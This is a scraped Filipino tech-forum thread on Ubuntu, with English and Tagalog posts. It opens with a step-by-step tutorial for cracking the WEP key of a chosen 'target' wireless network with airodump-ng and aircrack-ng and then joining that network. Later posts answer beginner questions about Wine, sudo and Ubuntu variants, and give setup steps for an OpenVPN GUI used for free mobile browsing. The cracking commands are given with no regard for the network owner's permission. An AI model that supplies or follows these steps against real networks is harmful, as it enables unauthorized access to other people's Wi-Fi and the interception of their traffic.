Symbianize Forum

Most of our features and services are available only to members, so we encourage you to login or register a new account. Registration is free, fast and simple. You only need to provide a valid email. Being a member you'll gain access to all member forums and features, post a message to ask question or provide answer, and share or find resources related to mobile phones, tablets, computers, game consoles, and multimedia.

All that and more, so what are you waiting for, click the register button and join us now! Ito ang website na ginawa ng pinoy para sa pinoy!

[TUTORIALS] Ubuntu (a Debian/GNU Linux Distribution)

Tutorial: Cracking Wireless Networks with aircrack-ng (Part 4b - WEP)

Part 4: Capturing IVs (4.b.1 - capturing data packets for WEP-encrypted wireless networks)

Cracking WEP-encrypted wireless networks is easier than WPA/WPA2-encrypted wireless networks. The commands to be used for WEP cracking are very similar to the commands for cracking WPA/WPA2 cracking per the aircrack-ng.org website, but for today I will use a slightly modified set of steps which may be much simpler than the one posted on their website.

I have a Nokia N900 and I am using the steps that I will be sharing to you. I tested these steps on a desktop computer and they also worked. The same steps can be found on my Nokia N900 Tutorial Thread.

Initial Step: you must be running as root. Otherwise you will have to type "sudo" before each command that I have listed below.

1. Change the wireless receiver to Monitor Mode (listen to data packets)

Code:
[SIZE=4]ifconfig wlan0 down[/SIZE]
[SIZE=4]iwconfig wlan0 mode Monitor[/SIZE]
[SIZE=4]ifconfig wlan0 up[/SIZE]

2. Monitor for possible target networks

Code:
[SIZE=4]airodump-ng wlan0[/SIZE]

- If you are satisfied with the list of wireless networks that your computer is able to see, press Ctrl+K on your keyboard to stop.
- Identify your target network from the list (should have WEP encryption).

3. Capture data packets (IVs)

Code:
 airodump-ng --channel (enter the channel number of your target here) --bssid (enter MAC address of target here) -w (filename of your captured  data, you can enter whatever you want) --ivs wlan0

Example:

Code:
airodump-ng --channel 6 --bssid (xx:xx:xx:xx:xx:xx) -w susi --ivs wlan0

- Wait until you capture at least 15,000 up to around 400,000 packets (check #Data column)
- Press Ctrl + C on your keyboard to stop

You are now ready for the next step, which is the actual cracking of the WEP key. This can be done offline or even when you are not in range of the wireless network/router.

NOTE: If you want to see screenshots, you can visit the Nokia N900 tutorial on WEP cracking. The steps are exactly the same anyway.

Last edited:
Tutorial: Cracking Wireless Networks with aircrack-ng (Part 4b - WEP)

Part 4: Capturing IVs (4.b.2 - cracking the code for WEP-encrypted wireless networks)

Here is the final step!

Requirement: you must be running as root. Otherwise you will have to type "sudo" before each command listed below.

1. Run the aircrack-ng command

In Terminal, type this command and press Enter.

Code:
 [/SIZE]
[SIZE=4]aircrack-ng (filename of your capture file)*.ivs[/SIZE]
[SIZE=4]

Example:

Code:
 [/SIZE]
[SIZE=4]aircrack-ng work*.ivs[/SIZE]
[SIZE=4]

- Placing an asterisk (*) instructs aircrack-ng to do a "wild card" search.
- In the example command above, the filename that I used for the captured files is "work".

- Once discovered, WEP Key is in this format xx:xx:xx:xx. Just remove the ":" when typing this key to connect to your target network.

2. Change the wireless receiver back to Managed Mode

Code:
 [/SIZE]
[SIZE=4]ifconfig wlan0 down
iwconfig wlan0 mode Managed
ifconfig wlan0 up[/SIZE]
[SIZE=4]

- Now try to connect to your target network.
- When asked for the password, enter the password that you were able to discover. Just type the password without the colons ":" .

NOTES:

For WEP cracking, I simply followed the instructions here: http://www.youtube.com/watch?v=txBfZr-fFag

You may also follow the tutorial on my Nokia N900 Thread to see screenshots, since the steps are exactly the same.

Last edited:
bossing tanung lang gusto ko kasi talga gumamt ng abunto kasi kulang ng isang driver ang laptop ko e bossing mag run b ang mga windows application sa ubunto kasi mas mbilis ang abuntu at yun ang gusto ko hindi ko lang alm kong pd ko xa mlagyan ng mga application n pang windows any comment?

bossing tanung lang gusto ko kasi talga gumamt ng abunto kasi kulang ng isang driver ang laptop ko e bossing mag run b ang mga windows application sa ubunto kasi mas mbilis ang abuntu at yun ang gusto ko hindi ko lang alm kong pd ko xa mlagyan ng mga application n pang windows any comment?

hindi lahat sir. may mga windows app na gagana via WINE .pero hindi lahat compatible. pero madalas naman may UBUNTU alternative sa mga Windows apps. :)

hindi lahat sir. may mga windows app na gagana via WINE .pero hindi lahat compatible. pero madalas naman may UBUNTU alternative sa mga Windows apps. :)

Marknil,

Welcome to the thread. :) To know more about Wine and how it makes Microsoft Windows-based applications run in Linux-based Operating Systems, please visit the first page of this thread.

Tama si Markman...even if there is Wine, it can't run ALL MS Windows-based applications. On the website of Wine, there is a database of applications that can be run in Wine. Also, Windows-based applications are given ratings (Platinum, Gold, Silver, Bronze, Garbage). This will help you determine how well a Windows application runs with Wine.

Hope this helps. :)

elow po ts ask ko lang pano po ba mag run as root sa terminal..tnx a lot...still learning and more power d2 sa thread nato ako ung 10 mins boot up dati..hehe...advisable po ba sa newbie mag run as root sa terminal or not..tnx po ulit

elow po ts ask ko lang pano po ba mag run as root sa terminal..tnx a lot...still learning and more power d2 sa thread nato ako ung 10 mins boot up dati..hehe...advisable po ba sa newbie mag run as root sa terminal or not..tnx po ulit

Hi Friend,

Advice ko for newbies, wag na lang muna mag-run as root. Instead,type sudo before the command you want to use. Anyway hindi naman lahat ng command kailangang naka-root eh. Ako nga kahit medyo marunong na ako sa Linux bihira kong gawin ang mag-run as root.

Last edited:
ah my ask pa po ako ts, why po kaya pag kinoclose ko na ung chronium na browser eh nag bre2akdown etong ubuntu ko..nag bla2ck screen po i mean...kaya ni remove ko n lang po ung chronium ko ano po kaya case nun??:noidea:

ah my ask pa po ako ts, why po kaya pag kinoclose ko na ung chronium na browser eh nag bre2akdown etong ubuntu ko..nag bla2ck screen po i mean...kaya ni remove ko n lang po ung chronium ko ano po kaya case nun??:noidea:

Marami pong possible causes yan sir ..pedeng hardware or software.. kayo na lang po mag troubleshoot para malaman kung anu ung pinaka cause ..

eh sir terrible may question langp o ako sa airvpn pwede bang palitan nang proxy ung naka default sa air.ovpn na file...oh hindi cya kokonek sa server?ung tut nyo po ang gnawa ko..tnx po para dun

eh sir terrible may question langp o ako sa airvpn pwede bang palitan nang proxy ung naka default sa air.ovpn na file...oh hindi cya kokonek sa server?ung tut nyo po ang gnawa ko..tnx po para dun

Sir wala naman pong proxy akong nilagay .. siguro ung tinutukoy nyo is ung Gateway Address(94.23.211.188) .. di na po natin kailangang maglagay ng Parent Proxy dahil port 80 naman po ung port ng Gateway Address naten :D .. makakakonek tayo kahit wala pong Proxy dahil open ang port 80 ng Smart and Globe :dance:

mga Sir, Sir topet, dumating na kc ung CD ko ubuntu kubuntu, ask ko lng kong ano ang pinagkaiba ng 2. at alin mo ang mas maganda? try ko po kc gumamit linux OS thnk po :)

http://img832.imageshack.us/i/10015091.jpg/

mga Sir, Sir topet, dumating na kc ung CD ko ubuntu kubuntu, ask ko lng kong ano ang pinagkaiba ng 2. at alin mo ang mas maganda? try ko po kc gumamit linux OS thnk po :)

Hi Friend,

Maraming derivatives ng Ubuntu: Kubuntu, Lubuntu, Xubuntu, Edubuntu, MythBuntu, Ubuntu Studio, Super OS (formerly called Super Ubuntu), Ubuntu Ultimate Edition, etc. etc. Pati nga ang Back|Track, Zorin, at Linux Mint ay based sa Ubuntu.

Mga variations sila kumbaga, na iba-iba ang hitsura sa labas, pero lahat sila ay Ubuntu rin "under-the-hood".

To help you better understand, please read this: http://www.psychocats.net/ubuntu/kdegnome.

Actually puwede rin namang pagpatung-patungin ang lahat ng *buntu sa iisang installation lang, check mo na lang ang Page 1 ng thread na ito for the details. Ginawa ko na dati yun.

Kung gusto mo pang palawakin lalo ang topic, eto na ang maire-recommend kong basahin mo: http://en.wikipedia.org/wiki/List_of_linux_distributions

Last edited:
Hi Friend,

Maraming derivatives ng Ubuntu: Kubuntu, Lubuntu, Xubuntu, Edubuntu, MythBuntu, Ubuntu Studio, Super OS (formerly called Super Ubuntu), Ubuntu Ultimate Edition, etc. etc. Pati nga ang Back|Track, Zorin, at Linux Mint ay based sa Ubuntu.

Mga variations sila kumbaga, na iba-iba ang hitsura sa labas, pero lahat sila ay Ubuntu rin "under-the-hood".

To help you better understand, please read this: http://www.psychocats.net/ubuntu/kdegnome.

Actually puwede rin namang pagpatung-patungin ang lahat ng *buntu sa iisang installation lang, check mo na lang ang Page 1 ng thread na ito for the details. Ginawa ko na dati yun.

Kung gusto mo pang palawakin lalo ang topic, eto na ang maire-recommend kong basahin mo: http://en.wikipedia.org/wiki/List_of_linux_distributions

thnks sir :)i'd try to study about linux. punta n lng ako d2 sa thread na to kapag my mga tanung pa po ako :)

thnks sir :)i'd try to study about linux. punta n lng ako d2 sa thread na to kapag my mga tanung pa po ako :)

No problem; bisita ka lang maraming tutulong sa iyo dito. :)

Re: FBT using OAST ( Java Based OpenVPN GUI Program)

FBT using OAST ( Java Based OpenVPN GUI Program)

First run this on terminal : sudo apt-get update && sudo apt-get upgrade
then reboot if necessary
OAST is a java based OpenVPN GUI program so we need these
attachment.php

and maybe these
attachment.php

now download OAST
http://sourceforge.net/projects/oast/files/oast/OAST 2.4/oast-2.4-linux-x86.sh/download

move the downloaded file to desktop and run this command in terminal :
sudo bash ~/Desktop/oast-2.4-linux-x86.sh
Follow the Installation Wizard ..
attachment.php
attachment.php

attachment.php
attachment.php

attachment.php

attachment.php
attachment.php

then run oast ..
5775880Workspace_1_013.jpeg

click settings and browse for your openvpn config file
5934684Selection_014.jpeg

then press ok .. then after that youre ready to connect
Press Connect.
1402248Workspace_1_015.jpeg

Operating System Linux SmartMove!!! haha :dance:
I used AirVPN... Any comments ,feedbacks ,violent reactions ,etc. are welcome. Gudlak! :salute:

tanong ko lang po. sino na po nakasubok nito? and anong broadbands gamit nyo. ty!

nainstall ko na sya. hindi nag-llaunch. =(

Last edited:
Re: FBT using OAST ( Java Based OpenVPN GUI Program)

tanong ko lang po. sino na po nakasubok nito? and anong broadbands gamit nyo. ty!

nainstall ko na sya. hindi nag-llaunch. =(

run it in terminal : java -version
and post here the output

Back
Top Bottom